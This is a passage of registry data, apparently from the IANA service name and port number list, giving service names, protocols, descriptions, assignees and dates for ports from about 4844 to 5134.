LogServer,[Ross_Swithenbank],[Ross_Swithenbank],2006-09,,,,, gw-log,4844,udp,nCode ICE-flow Library LogServer,[Ross_Swithenbank],[Ross_Swithenbank],2006-09,,,,, wcr-remlib,4845,tcp,WordCruncher Remote Library Service,[Jason_Dzubak],[Jason_Dzubak],2008-03-17,,,,, wcr-remlib,4845,udp,WordCruncher Remote Library Service,[Jason_Dzubak],[Jason_Dzubak],2008-03-17,,,,, contamac-icm,4846,tcp,"Contamac ICM Service IANA assigned this well-formed service name as a replacement for ""contamac_icm"".",[Abdullah_Obeid],[Abdullah_Obeid],2008-03-20,,,,, contamac_icm,4846,tcp,Contamac ICM Service,[Abdullah_Obeid],[Abdullah_Obeid],2008-03-20,,,,,"This entry is an alias to ""contamac-icm"". This entry is now historic, not usable for use with many common service discovery mechanisms." contamac-icm,4846,udp,"Contamac ICM Service IANA assigned this well-formed service name as a replacement for ""contamac_icm"".",[Abdullah_Obeid],[Abdullah_Obeid],2008-03-20,,,,, contamac_icm,4846,udp,Contamac ICM Service,[Abdullah_Obeid],[Abdullah_Obeid],2008-03-20,,,,,"This entry is an alias to ""contamac-icm"". This entry is now historic, not usable for use with many common service discovery mechanisms." wfc,4847,tcp,Web Fresh Communication,[Jonathan_Bastnagel],[Jonathan_Bastnagel],2007-09-17,,,,, wfc,4847,udp,Web Fresh Communication,[Jonathan_Bastnagel],[Jonathan_Bastnagel],2007-09-17,,,,, appserv-http,4848,tcp,App Server - Admin HTTP,,,,,,,, appserv-http,4848,udp,App Server - Admin HTTP,,,,,,,, appserv-https,4849,tcp,App Server - Admin HTTPS,[Sreeram_Duvvuru],[Sreeram_Duvvuru],2002-04,,,,, appserv-https,4849,udp,App Server - Admin HTTPS,[Sreeram_Duvvuru],[Sreeram_Duvvuru],2002-04,,,,, sun-as-nodeagt,4850,tcp,Sun App Server - NA,[Kedar_Mhaswade],[Kedar_Mhaswade],2004-11,,,,, sun-as-nodeagt,4850,udp,Sun App Server - NA,[Kedar_Mhaswade],[Kedar_Mhaswade],2004-11,,,,, derby-repli,4851,tcp,Apache Derby Replication,[Jorgen_Loland],[Jorgen_Loland],2008-02-27,,,,, derby-repli,4851,udp,Apache Derby Replication,[Jorgen_Loland],[Jorgen_Loland],2008-02-27,,,,, ,4852-4866,,Unassigned,,,,,,,, unify-debug,4867,tcp,Unify Debugger,[Daegis_Inc],[Chris_Anderson],2006-05,2012-07-31,,,, unify-debug,4867,udp,Unify Debugger,[Daegis_Inc],[Chris_Anderson],2006-05,2012-07-31,,,, phrelay,4868,tcp,Photon Relay,,,,,,,, phrelay,4868,udp,Photon Relay,,,,,,,, phrelaydbg,4869,tcp,Photon Relay Debug,[Michael_Hunter],[Michael_Hunter],,,,,, phrelaydbg,4869,udp,Photon Relay Debug,[Michael_Hunter],[Michael_Hunter],,,,,, cc-tracking,4870,tcp,Citcom Tracking Service,[Wolfgang_Weidner],[Wolfgang_Weidner],2005-12,,,,, cc-tracking,4870,udp,Citcom Tracking Service,[Wolfgang_Weidner],[Wolfgang_Weidner],2005-12,,,,, wired,4871,tcp,Wired,[Axel_Andersson],[Axel_Andersson],2006-02,,,,, wired,4871,udp,Wired,[Axel_Andersson],[Axel_Andersson],2006-02,,,,, ,4872-4875,,Unassigned,,,,,,,, tritium-can,4876,tcp,Tritium CAN Bus Bridge Service,[James_Kennedy],[James_Kennedy],2011-02-15,,,,, tritium-can,4876,udp,Tritium CAN Bus Bridge Service,[James_Kennedy],[James_Kennedy],2011-02-15,,,,, lmcs,4877,tcp,Lighting Management Control System,[Timothy_Parry],[Timothy_Parry],2011-02-15,,,,, lmcs,4877,udp,Lighting Management Control System,[Timothy_Parry],[Timothy_Parry],2011-02-15,,,,, ,4878,tcp,Reserved,,,,,,,, inst-discovery,4878,udp,Agilent Instrument Discovery,[Charles_F_Steele],[Charles_F_Steele],2011-02-15,,,,, wsdl-event,4879,tcp,WSDL Event Receiver,[Charles_F_Steele],[Charles_F_Steele],2011-02-15,,,,, ,4879,udp,Reserved,,,,,,,, hislip,4880,tcp,IVI High-Speed LAN Instrument Protocol,[Joe_Mueller],[Joe_Mueller],2010-01-11,,,,, ,4880,udp,Reserved,,,,,,,, ,4881,tcp,Reserved,,,,,,,, socp-t,4881,udp,SOCP Time Synchronization Protocol,[Joe_Haver],[Joe_Haver],2010-05-28,,,,, ,4882,tcp,Reserved,,,,,,,, socp-c,4882,udp,SOCP Control Protocol,[Joe_Haver],[Joe_Haver],2010-05-28,,,,, wmlserver,4883,tcp,Meier-Phelps License Server,[William_Phelps],[William_Phelps],2010-03-22,,,,, ,4883,udp,Reserved,,,,,,,, hivestor,4884,tcp,HiveStor Distributed File System,[Nicholas_Young],[Nicholas_Young],2008-07-10,,,,, hivestor,4884,udp,HiveStor Distributed File System,[Nicholas_Young],[Nicholas_Young],2008-07-10,,,,, abbs,4885,tcp,ABBS,[Ryan_Rubley],[Ryan_Rubley],,,,,, abbs,4885,udp,ABBS,[Ryan_Rubley],[Ryan_Rubley],,,,,, ,4886-4893,,Unassigned,,,,,,,, lyskom,4894,tcp,LysKOM Protocol A,[Per_Cederqvist],[Per_Cederqvist],,,,,, lyskom,4894,udp,LysKOM Protocol A,[Per_Cederqvist],[Per_Cederqvist],,,,,, ,4895-4898,,Unassigned,,,,,,,, radmin-port,4899,tcp,RAdmin Port,[Dmitri_Znosko],[Dmitri_Znosko],2003-03,,,,, radmin-port,4899,udp,RAdmin Port,[Dmitri_Znosko],[Dmitri_Znosko],2003-03,,,,, hfcs,4900,tcp,HFSQL Client/Server Database Engine,[PC_SOFT],[Jerome_AERTS_2],2006-03-02,2014-02-02,,,, hfcs,4900,udp,HFSQL Client/Server Database Engine,[PC_SOFT],[Jerome_AERTS_2],2006-03-02,2014-02-02,,,, flr-agent,4901,tcp,"FileLocator Remote Search Agent IANA assigned this well-formed service name as a replacement for ""flr_agent"".",[David_Vest],[David_Vest],2008-11-19,,,,, flr_agent,4901,tcp,FileLocator Remote Search Agent,[David_Vest],[David_Vest],2008-11-19,,,,,"This entry is an alias to ""flr-agent"". This entry is now historic, not usable for use with many common service discovery mechanisms." ,4901,udp,Reserved,,,,,,,, magiccontrol,4902,tcp,magicCONROL RF and Data Interface,[Andreas_Spalenski],[Andreas_Spalenski],2008-11-24,,,,, ,4902,udp,Reserved,,,,,,,, ,4903-4911,,Unassigned,,,,,,,, lutap,4912,tcp,Technicolor LUT Access Protocol,[Markus_Loeffler],[Markus_Loeffler],2009-02-17,,,,, ,4912,udp,Reserved,,,,,,,, lutcp,4913,tcp,LUTher Control Protocol,[Markus_Loeffler],[Markus_Loeffler],2007-07-03,,,,, bones,4914,tcp,Bones Remote Control,[Andreas_Foedrowitz],[Andreas_Foedrowitz],2008-06-18,,,,, bones,4914,udp,Bones Remote Control,[Andreas_Foedrowitz],[Andreas_Foedrowitz],2008-06-18,,,,, frcs,4915,tcp,Fibics Remote Control Service,[Ken_Lagarec],[Ken_Lagarec],2009-04-17,,,,, ,4915,udp,Reserved,,,,,,,, ,4916-4935,,Unassigned,,,,,,,, an-signaling,4936,udp,Signal protocol port for autonomic networking,[Cisco_systems_3],[Toerless_Eckert_2],2014-06-06,,,,, ,4936,tcp,Reserved,,,,,,,, ,4937,tcp,Reserved,,,,,,,, atsc-mh-ssc,4937,udp,ATSC-M/H Service Signaling Channel,[Jerry_Whitaker],[Jerry_Whitaker],2008-10-27,,,,, ,4938-4939,,Unassigned,,,,,,,, eq-office-4940,4940,tcp,Equitrac Office,,,,,,,, eq-office-4940,4940,udp,Equitrac Office,,,,,,,, eq-office-4941,4941,tcp,Equitrac Office,,,,,,,, eq-office-4941,4941,udp,Equitrac Office,,,,,,,, eq-office-4942,4942,tcp,Equitrac Office,[Tom_Haapanen_2],[Tom_Haapanen_2],2007-07-11,,,,, eq-office-4942,4942,udp,Equitrac Office,[Tom_Haapanen_2],[Tom_Haapanen_2],2007-07-11,,,,, ,4943-4948,,Unassigned,,,,,,,, munin,4949,tcp,Munin Graphing Framework,[Jimmy_Olsen],[Jimmy_Olsen],2010-12-24,,,,, munin,4949,udp,Munin Graphing Framework,[Jimmy_Olsen],[Jimmy_Olsen],2010-12-24,,,,, sybasesrvmon,4950,tcp,Sybase Server Monitor,[Chris_Irie],[Chris_Irie],2008-03-26,,,,, sybasesrvmon,4950,udp,Sybase Server Monitor,[Chris_Irie],[Chris_Irie],2008-03-26,,,,, pwgwims,4951,tcp,PWG WIMS,[Ira_McDonald],[Ira_McDonald],2005-12,,,,, pwgwims,4951,udp,PWG WIMS,[Ira_McDonald],[Ira_McDonald],2005-12,,,,, sagxtsds,4952,tcp,SAG Directory Server,[Michael_Chirila],[Michael_Chirila],2006-01,,,,, sagxtsds,4952,udp,SAG Directory Server,[Michael_Chirila],[Michael_Chirila],2006-01,,,,, dbsyncarbiter,4953,tcp,Synchronization Arbiter,[Dave_Neudoerffer_2],[Dave_Neudoerffer_2],2009-11-18,,,,, ,4953,udp,Reserved,,,,,,,, ,4954-4968,,Unassigned,,,,,,,Known UNAUTHORIZED USE: port 4967, ccss-qmm,4969,tcp,CCSS QMessageMonitor,,,,,,,, ccss-qmm,4969,udp,CCSS QMessageMonitor,,,,,,,, ccss-qsm,4970,tcp,CCSS QSystemMonitor,[David_Young],[David_Young],2006-01,,,,, ccss-qsm,4970,udp,CCSS QSystemMonitor,[David_Young],[David_Young],2006-01,,,,, ,4971-4982,,Unassigned,,,,,,,, ,4983,,Unassigned,,,,2005-12-22,,,, webyast,4984,tcp,WebYast,[Federico_Lucifredi],[Federico_Lucifredi],2009-09-25,,,,, ,4984,udp,Reserved,,,,,,,, gerhcs,4985,tcp,GER HC Standard,[Roger_Ward],[Roger_Ward],2009-09-25,,,,, ,4985,udp,Reserved,,,,,,,, mrip,4986,tcp,Model Railway Interface Program,[Howard_Amos],[Howard_Amos],2006-04,,,,, mrip,4986,udp,Model Railway Interface Program,[Howard_Amos],[Howard_Amos],2006-04,,,,, smar-se-port1,4987,tcp,SMAR Ethernet Port 1,,,,,,,, smar-se-port1,4987,udp,SMAR Ethernet Port 1,,,,,,,, smar-se-port2,4988,tcp,SMAR Ethernet Port 2,[Delcio_Prizon],[Delcio_Prizon],,,,,, smar-se-port2,4988,udp,SMAR Ethernet Port 2,[Delcio_Prizon],[Delcio_Prizon],,,,,, parallel,4989,tcp,Parallel for GAUSS (tm),[Matthew_Ford],[Matthew_Ford],2003-03,,,,, parallel,4989,udp,Parallel for GAUSS (tm),[Matthew_Ford],[Matthew_Ford],2003-03,,,,, busycal,4990,tcp,BusySync Calendar Synch. Protocol,[David_Riggle],[David_Riggle],2008-01-07,,,,,Defined TXT keys: Proprietary busycal,4990,udp,BusySync Calendar Synch. Protocol,[David_Riggle],[David_Riggle],2008-01-07,,,,,Defined TXT keys: Proprietary vrt,4991,tcp,VITA Radio Transport,[Sam_Bretheim],[Sam_Bretheim],2009-01-08,,,,, vrt,4991,udp,VITA Radio Transport,[Sam_Bretheim],[Sam_Bretheim],2009-01-08,,,,, ,4992-4998,,Unassigned,,,,,,,, hfcs-manager,4999,tcp,HFSQL Client/Server Database Engine Manager,[PC_SOFT],[Jerome_AERTS_2],2006-03-02,2014-02-02,,,, hfcs-manager,4999,udp,HFSQL Client/Server Database Engine Manager,[PC_SOFT],[Jerome_AERTS_2],2006-03-02,2014-02-02,,,, commplex-main,5000,tcp,,,,,,,,, commplex-main,5000,udp,,,,,,,,, commplex-link,5001,tcp,,,,,,,,, commplex-link,5001,udp,,,,,,,,, rfe,5002,tcp,radio free ethernet,,,,,,,, rfe,5002,udp,radio free ethernet,,,,,,,, fmpro-internal,5003,tcp,"FileMaker, Inc. - Proprietary transport",[Clay_Maeckel],[Clay_Maeckel],,,,,, fmpro-internal,5003,udp,"FileMaker, Inc. - Proprietary name binding",[Clay_Maeckel],[Clay_Maeckel],,,,,, avt-profile-1,5004,tcp,RTP media data,,,,,[RFC3551][RFC4571],,, avt-profile-1,5004,udp,RTP media data,,,,,[RFC3551],,, avt-profile-1,5004,dccp,RTP media data,,,,,[RFC3551][RFC5762],,, avt-profile-2,5005,tcp,RTP control protocol,,,,,[RFC3551][RFC4571],,, avt-profile-2,5005,udp,RTP control protocol,,,,,[RFC3551],,, avt-profile-2,5005,dccp,RTP control protocol,,,,,[RFC3551][RFC5762],,, wsm-server,5006,tcp,wsm server,[Adam_Berk],[Adam_Berk],,,,,, wsm-server,5006,udp,wsm server,[Adam_Berk],[Adam_Berk],,,,,, wsm-server-ssl,5007,tcp,wsm server ssl,[Adam_Berk],[Adam_Berk],,,,,, wsm-server-ssl,5007,udp,wsm server ssl,[Adam_Berk],[Adam_Berk],,,,,, synapsis-edge,5008,tcp,Synapsis EDGE,[Paul_Schilling],[Paul_Schilling],,,,,, synapsis-edge,5008,udp,Synapsis EDGE,[Paul_Schilling],[Paul_Schilling],,,,,, winfs,5009,tcp,Microsoft Windows Filesystem,[Simon_Skaria],[Simon_Skaria],2006-01,,,,, winfs,5009,udp,Microsoft Windows Filesystem,[Simon_Skaria],[Simon_Skaria],2006-01,,,,, telelpathstart,5010,tcp,TelepathStart,[Helmuth_Breitenfelln],[Helmuth_Breitenfelln],,,,,, telelpathstart,5010,udp,TelepathStart,[Helmuth_Breitenfelln],[Helmuth_Breitenfelln],,,,,, telelpathattack,5011,tcp,TelepathAttack,[Helmuth_Breitenfelln],[Helmuth_Breitenfelln],,,,,, telelpathattack,5011,udp,TelepathAttack,[Helmuth_Breitenfelln],[Helmuth_Breitenfelln],,,,,, nsp,5012,tcp,NetOnTap Service,[Kim_Hancock],[Kim_Hancock],2007-10-24,,,,, nsp,5012,udp,NetOnTap Service,[Kim_Hancock],[Kim_Hancock],2007-10-24,,,,, fmpro-v6,5013,tcp,"FileMaker, Inc. - Proprietary transport",[Alex_Chen],[Alex_Chen],2007-08-01,,,,, fmpro-v6,5013,udp,"FileMaker, Inc. - Proprietary transport",[Alex_Chen],[Alex_Chen],2007-08-01,,,,, ,5014,tcp,Reserved,,,,,,,, onpsocket,5014,udp,Overlay Network Protocol,[Roger_Matthias],[Roger_Matthias],2009-08-24,,,,, fmwp,5015,tcp,"FileMaker, Inc. - Web publishing",[Alex_Chen],[Alex_Chen],2009-11-25,,,,, ,5015,udp,Reserved,,,,,,,, ,5016-5019,,Unassigned,,,,,,,, zenginkyo-1,5020,tcp,zenginkyo-1,[Masashi_Suzaki],[Masashi_Suzaki],,,,,, zenginkyo-1,5020,udp,zenginkyo-1,[Masashi_Suzaki],[Masashi_Suzaki],,,,,, zenginkyo-2,5021,tcp,zenginkyo-2,[Masashi_Suzaki],[Masashi_Suzaki],,,,,, zenginkyo-2,5021,udp,zenginkyo-2,[Masashi_Suzaki],[Masashi_Suzaki],,,,,, mice,5022,tcp,mice server,[Alan_Clifford],[Alan_Clifford],,,,,, mice,5022,udp,mice server,[Alan_Clifford],[Alan_Clifford],,,,,, htuilsrv,5023,tcp,Htuil Server for PLD2,[Dennis_Reinhardt],[Dennis_Reinhardt],,,,,, htuilsrv,5023,udp,Htuil Server for PLD2,[Dennis_Reinhardt],[Dennis_Reinhardt],,,,,, scpi-telnet,5024,tcp,SCPI-TELNET,[Ryan_Columbus],[Ryan_Columbus],2002-10,,,,, scpi-telnet,5024,udp,SCPI-TELNET,[Ryan_Columbus],[Ryan_Columbus],2002-10,,,,, scpi-raw,5025,tcp,SCPI-RAW,[Ryan_Columbus],[Ryan_Columbus],2002-10,,,,, scpi-raw,5025,udp,SCPI-RAW,[Ryan_Columbus],[Ryan_Columbus],2002-10,,,,, strexec-d,5026,tcp,Storix I/O daemon (data),[Anthony_Johnson],[Anthony_Johnson],2005-08,,,,, strexec-d,5026,udp,Storix I/O daemon (data),[Anthony_Johnson],[Anthony_Johnson],2005-08,,,,, strexec-s,5027,tcp,Storix I/O daemon (stat),[Anthony_Johnson],[Anthony_Johnson],2005-08,,,,, strexec-s,5027,udp,Storix I/O daemon (stat),[Anthony_Johnson],[Anthony_Johnson],2005-08,,,,, qvr,5028,tcp,Quiqum Virtual Relais,[Philipp_Marcel_Albre],[Philipp_Marcel_Albre],2009-07-06,,,,, ,5028,udp,Reserved,,,,,,,, infobright,5029,tcp,Infobright Database Server,[Mark_Windrim],[Mark_Windrim],2009-07-23,,,,, infobright,5029,udp,Infobright Database Server,[Mark_Windrim],[Mark_Windrim],2009-07-23,,,,, surfpass,5030,tcp,SurfPass,[Olivier_Guezenec],[Olivier_Guezenec],2006-12,,,,, surfpass,5030,udp,SurfPass,[Olivier_Guezenec],[Olivier_Guezenec],2006-12,,,,, ,5031,tcp,Reserved,,,,,,,, dmp,5031,udp,Direct Message Protocol,[Gjermund_Wallenius],[Gjermund_Wallenius],2009-09-30,,,,, signacert-agent,5032,tcp,SignaCert Enterprise Trust Server Agent,[Harris_Corporation],[Daniel_R_Somerfield],2011-08-05,,,,, ,5032,udp,Reserved,,,,,,,, ,5033-5041,,Unassigned,,,,,,,, asnaacceler8db,5042,tcp,asnaacceler8db,[Walter_Goodwin],[Walter_Goodwin],,,,,, asnaacceler8db,5042,udp,asnaacceler8db,[Walter_Goodwin],[Walter_Goodwin],,,,,, swxadmin,5043,tcp,ShopWorX Administration,[Don_W_Fitzpatrick],[Don_W_Fitzpatrick],2005-08,,,,, swxadmin,5043,udp,ShopWorX Administration,[Don_W_Fitzpatrick],[Don_W_Fitzpatrick],2005-08,,,,, lxi-evntsvc,5044,tcp,LXI Event Service,[Nick_Barendt],[Nick_Barendt],2005-08,,,,, lxi-evntsvc,5044,udp,LXI Event Service,[Nick_Barendt],[Nick_Barendt],2005-08,,,,, osp,5045,tcp,Open Settlement Protocol,[Dmitry_Isakbayev],[Dmitry_Isakbayev],2010-03-05,,,,, ,5045,udp,Reserved,,,,,,,, ,5046,tcp,Reserved,,,,,,,, vpm-udp,5046,udp,Vishay PM UDP Service,[Ashley_Clarke],[Ashley_Clarke],2010-06-17,,,,, ,5047,tcp,Reserved,,,,,,,, iscape,5047,udp,iSCAPE Data Broadcasting,[Roland_van_der_Veen],[Roland_van_der_Veen],2010-06-17,,,,, texai,5048,tcp,Texai Message Service,[Stephen_Reed_2],[Stephen_Reed_2],2010-06-17,,,,, ,5048,udp,Reserved,,,,,,,, ivocalize,5049,tcp,iVocalize Web Conference,[Bryan_Vergato],[Bryan_Vergato],2006-05,,,,, ivocalize,5049,udp,iVocalize Web Conference,[Bryan_Vergato],[Bryan_Vergato],2006-05,,,,, mmcc,5050,tcp,multimedia conference control tool,[Steve_Casner],[Steve_Casner],,,,,, mmcc,5050,udp,multimedia conference control tool,[Steve_Casner],[Steve_Casner],,,,,, ita-agent,5051,tcp,ITA Agent,[Don_Merrell],[Don_Merrell],,,,,, ita-agent,5051,udp,ITA Agent,[Don_Merrell],[Don_Merrell],,,,,, ita-manager,5052,tcp,ITA Manager,[Don_Merrell],[Don_Merrell],,,,,, ita-manager,5052,udp,ITA Manager,[Don_Merrell],[Don_Merrell],,,,,, rlm,5053,tcp,RLM License Server,[Matt_Christiano_2],[Matt_Christiano_2],2008-07-28,,,,, rlm-disc,5053,udp,RLM Discovery Server,[Reprise_Software_Inc],[Matt_Christiano_3],2012-11-06,,,,, rlm-admin,5054,tcp,RLM administrative interface,[Matt_Christiano_2],[Matt_Christiano_2],2008-07-28,,,,, ,5054,udp,Reserved,,,,,,,, unot,5055,tcp,UNOT,[Gordon_Mohr_2],[Gordon_Mohr_2],,,,,, unot,5055,udp,UNOT,[Gordon_Mohr_2],[Gordon_Mohr_2],,,,,, intecom-ps1,5056,tcp,Intecom Pointspan 1,[David_Meermans],[David_Meermans],,,,,, intecom-ps1,5056,udp,Intecom Pointspan 1,[David_Meermans],[David_Meermans],,,,,, intecom-ps2,5057,tcp,Intecom Pointspan 2,[David_Meermans],[David_Meermans],,,,,, intecom-ps2,5057,udp,Intecom Pointspan 2,[David_Meermans],[David_Meermans],,,,,, ,5058,tcp,Reserved,,,,,,,, locus-disc,5058,udp,Locus Discovery,[Alan_King],[Alan_King],2009-08-13,,,,, sds,5059,tcp,SIP Directory Services,[Arthur_Wilton],[Arthur_Wilton],2006-03,,,,, sds,5059,udp,SIP Directory Services,[Arthur_Wilton],[Arthur_Wilton],2006-03,,,,, sip,5060,tcp,SIP,,,,2014-04-09,[RFC3263],,, sip,5060,udp,SIP,,,,2014-04-09,[RFC3263],,, sip,5060,sctp,SIP,,,,,[RFC4168],,, sips,5061,tcp,SIP-TLS,,,,2014-04-09,[RFC3263],,, sips,5061,udp,SIP-TLS,,,,2014-04-09,[RFC3263],,, sips,5061,sctp,SIP-TLS,,,,,[RFC4168],,, na-localise,5062,tcp,Localisation access,[Jean_Pierre_Garcia_2],[Jean_Pierre_Garcia_2],2009-10-28,,,,, na-localise,5062,udp,Localisation access,[Jean_Pierre_Garcia_2],[Jean_Pierre_Garcia_2],2009-10-28,,,,, csrpc,5063,tcp,centrify secure RPC,[Paul_Moore],[Paul_Moore],2009-10-28,,,,, ,5063,udp,Reserved,,,,,,,, ca-1,5064,tcp,Channel Access 1,[Jeffrey_Hill],[Jeffrey_Hill],2002-08,,,,, ca-1,5064,udp,Channel Access 1,[Jeffrey_Hill],[Jeffrey_Hill],2002-08,,,,, ca-2,5065,tcp,Channel Access 2,[Jeffrey_Hill],[Jeffrey_Hill],2002-08,,,,, ca-2,5065,udp,Channel Access 2,[Jeffrey_Hill],[Jeffrey_Hill],2002-08,,,,, stanag-5066,5066,tcp,STANAG-5066-SUBNET-INTF,[Donald_G_Kallgren],[Donald_G_Kallgren],,,,,, stanag-5066,5066,udp,STANAG-5066-SUBNET-INTF,[Donald_G_Kallgren],[Donald_G_Kallgren],,,,,, authentx,5067,tcp,Authentx Service,[Alberto_Fernandez],[Alberto_Fernandez],2006-01,,,,, authentx,5067,udp,Authentx Service,[Alberto_Fernandez],[Alberto_Fernandez],2006-01,,,,, bitforestsrv,5068,tcp,Bitforest Data Service,[Ville_Pekka_Vahteala],[Ville_Pekka_Vahteala],2008-06-05,,,,, ,5068,udp,Reserved,,,,,,,, i-net-2000-npr,5069,tcp,I/Net 2000-NPR,[Chris_Megede],[Chris_Megede],,,,,, i-net-2000-npr,5069,udp,I/Net 2000-NPR,[Chris_Megede],[Chris_Megede],,,,,, vtsas,5070,tcp,VersaTrans Server Agent Service,[Christopher_Miller],[Christopher_Miller],2006-02,,,,, vtsas,5070,udp,VersaTrans Server Agent Service,[Christopher_Miller],[Christopher_Miller],2006-02,,,,, powerschool,5071,tcp,PowerSchool,[Greg_Porter],[Greg_Porter],,,,,, powerschool,5071,udp,PowerSchool,[Greg_Porter],[Greg_Porter],,,,,, ayiya,5072,tcp,Anything In Anything,[Jeroen_Massar],[Jeroen_Massar],2005-08,,,,, ayiya,5072,udp,Anything In Anything,[Jeroen_Massar],[Jeroen_Massar],2005-08,,,,, tag-pm,5073,tcp,Advantage Group Port Mgr,[James_Goddard],[James_Goddard],2005-08,,,,, tag-pm,5073,udp,Advantage Group Port Mgr,[James_Goddard],[James_Goddard],2005-08,,,,, alesquery,5074,tcp,ALES Query,[Tim_Maloney],[Tim_Maloney],2005-08,,,,, alesquery,5074,udp,ALES Query,[Tim_Maloney],[Tim_Maloney],2005-08,,,,, pvaccess,5075,tcp,Experimental Physics and Industrial Control System,[Matej_Sekoranja],[Matej_Sekoranja],2012-03-23,,,,, ,5075,udp,Reserved,,,,,,,, ,5076-5077,,Unassigned,,,,,,,, pixelpusher,5078,udp,PixelPusher pixel data,[heroicrobotics.com],[Jasmine_Strong],2014-06-24,,,,, ,5078,tcp,Reserved,,,,,,,, ,5079,tcp,Reserved,,,,,,,, cp-spxrpts,5079,udp,Cambridge Pixel SPx Reports,[Richard_Warren],[Richard_Warren],2008-09-17,,,,, onscreen,5080,tcp,OnScreen Data Collection Service,[Christopher_Miller_2],[Christopher_Miller_2],2008-01-14,,,,, onscreen,5080,udp,OnScreen Data Collection Service,[Christopher_Miller_2],[Christopher_Miller_2],2008-01-14,,,,, sdl-ets,5081,tcp,SDL - Ent Trans Server,[Marc_Morin],[Marc_Morin],2002-04,,,,, sdl-ets,5081,udp,SDL - Ent Trans Server,[Marc_Morin],[Marc_Morin],2002-04,,,,, qcp,5082,tcp,Qpur Communication Protocol,[Joachim_Kluemper],[Joachim_Kluemper],2008-03-19,,,,, qcp,5082,udp,Qpur Communication Protocol,[Joachim_Kluemper],[Joachim_Kluemper],2008-03-19,,,,, qfp,5083,tcp,Qpur File Protocol,[Joachim_Kluemper],[Joachim_Kluemper],2008-03-19,,,,, qfp,5083,udp,Qpur File Protocol,[Joachim_Kluemper],[Joachim_Kluemper],2008-03-19,,,,, llrp,5084,tcp,EPCglobal Low-Level Reader Protocol,[Margaret_Wasserman][Paul_Dietrich],[Margaret_Wasserman][Paul_Dietrich],2006-11,,,,,Defined TXT keys: None. RFID reader Low Level Reader Protocol llrp,5084,udp,EPCglobal Low-Level Reader Protocol,[Margaret_Wasserman][Paul_Dietrich],[Margaret_Wasserman][Paul_Dietrich],2006-11,,,,,Defined TXT keys: None. RFID reader Low Level Reader Protocol encrypted-llrp,5085,tcp,EPCglobal Encrypted LLRP,[Margaret_Wasserman],[Margaret_Wasserman],2006-11,,,,, encrypted-llrp,5085,udp,EPCglobal Encrypted LLRP,[Margaret_Wasserman],[Margaret_Wasserman],2006-11,,,,, aprigo-cs,5086,tcp,Aprigo Collection Service,[Ron_Zalkind],[Ron_Zalkind],2010-05-28,,,,, ,5086,udp,Reserved,,,,,,,, biotic,5087,tcp,BIOTIC - Binary Internet of Things Interoperable Communication,[Clayster_Laboratorios_Chile_S.A.],[Peter_Waher],2014-06-16,,,,, ,5087,udp,Reserved,,,,,,,, ,5088-5089,,Unassigned,,,,,,,, car,5090,sctp,Candidate AR,,,,,,,, cxtp,5091,sctp,Context Transfer Protocol,,,2005-07,,[RFC4065],,, ,5092,tcp,Reserved,,,,,,,, magpie,5092,udp,Magpie Binary,[Phil_Maker],[Phil_Maker],2008-06-18,,,,, sentinel-lm,5093,tcp,Sentinel LM,[Derick_Snyder],[Derick_Snyder],,,,,, sentinel-lm,5093,udp,Sentinel LM,[Derick_Snyder],[Derick_Snyder],,,,,, hart-ip,5094,tcp,HART-IP,[Wally_Pratt_Jr],[Wally_Pratt_Jr],2010-03-02,,,,, hart-ip,5094,udp,HART-IP,[Wally_Pratt_Jr],[Wally_Pratt_Jr],2010-03-02,,,,, ,5095-5098,,Unassigned,,,,,,,, sentlm-srv2srv,5099,tcp,SentLM Srv2Srv,[Derick_Snyder],[Derick_Snyder],,,,,, sentlm-srv2srv,5099,udp,SentLM Srv2Srv,[Derick_Snyder],[Derick_Snyder],,,,,, socalia,5100,tcp,Socalia service mux,[Alberto_Raydan_2],[Alberto_Raydan_2],2005-08,,,,, socalia,5100,udp,Socalia service mux,[Alberto_Raydan_2],[Alberto_Raydan_2],2005-08,,,,, talarian-tcp,5101,tcp,Talarian_TCP,[Leo_Martins],[Leo_Martins],,,,,, talarian-udp,5101,udp,Talarian_UDP,[Leo_Martins],[Leo_Martins],,,,,, oms-nonsecure,5102,tcp,Oracle OMS non-secure,[Todd_Guay],[Todd_Guay],2005-08,,,,, oms-nonsecure,5102,udp,Oracle OMS non-secure,[Todd_Guay],[Todd_Guay],2005-08,,,,, actifio-c2c,5103,tcp,Actifio C2C,[Ravi_Kollipara],[Ravi_Kollipara],2010-06-18,,,,, ,5103,udp,Reserved,,,,,,,, ,5104,tcp,Reserved,,,,,,,, tinymessage,5104,udp,TinyMessage,[Josip_Medved],[Josip_Medved],2010-10-20,,,,, ,5105,tcp,Reserved,,,,,,,, hughes-ap,5105,udp,Hughes Association Protocol,[Varun_Santosh],[Varun_Santosh],2010-10-20,,,,, actifioudsagent,5106,tcp,Actifio UDS Agent,[Actifio],[Madhav_Mutalik],2014-06-05,,,,, ,5106,udp,Reserved,,,,,,,, ,5107-5110,,Unassigned,,,,,,,, taep-as-svc,5111,tcp,TAEP AS service,[Liu_Changchun],[Liu_Changchun],2008-11-05,,,,, taep-as-svc,5111,udp,TAEP AS service,[Liu_Changchun],[Liu_Changchun],2008-11-05,,,,, pm-cmdsvr,5112,tcp,PeerMe Msg Cmd Service,[Marcos_Della],[Marcos_Della],2005-08,,,,, pm-cmdsvr,5112,udp,PeerMe Msg Cmd Service,[Marcos_Della],[Marcos_Della],2005-08,,,,, ,5113,,Unassigned,,,2010-11-09,,,,, ev-services,5114,tcp,Enterprise Vault Services,[Richard_Jones_2],[Richard_Jones_2],2009-05-26,,,,, ,5114,udp,Reserved,,,,,,,, autobuild,5115,tcp,Symantec Autobuild Service,[David_Warden],[David_Warden],2008-11-17,,,,, ,5115,udp,Reserved,,,,,,,, ,5116,tcp,Reserved,,,,,,,, emb-proj-cmd,5116,udp,EPSON Projecter Image Transfer,[SEIKO_EPSON_4],[SEIKO_EPSON_4],2008-11-17,,,,, gradecam,5117,tcp,GradeCam Image Processing,[Robert_Porter],[Robert_Porter],2009-09-24,,,,, ,5117,udp,Reserved,,,,,,,, ,5118-5119,,Unassigned,,,,,,,, barracuda-bbs,5120,tcp,Barracuda Backup Protocol,[Barracuda_Networks],[Andrew_Blyler],2013-04-05,,,,, barracuda-bbs,5120,udp,Barracuda Backup Protocol,[Barracuda_Networks],[Andrew_Blyler],2013-04-05,,,,, ,5121-5132,,Unassigned,,,,,,,, nbt-pc,5133,tcp,Policy Commander,[Emily_Harris],[Emily_Harris],2004-11,,,,, nbt-pc,5133,udp,Policy Commander,[Emily_Harris],[Emily_Harris],2004-11,,,,, ppactivation,5134,tcp,PP ActivationServer,[Ian_Bradley],[Ian_Bradley],2009-10-14,,,,, ,5134,udp,Reserved,,,,,,,, 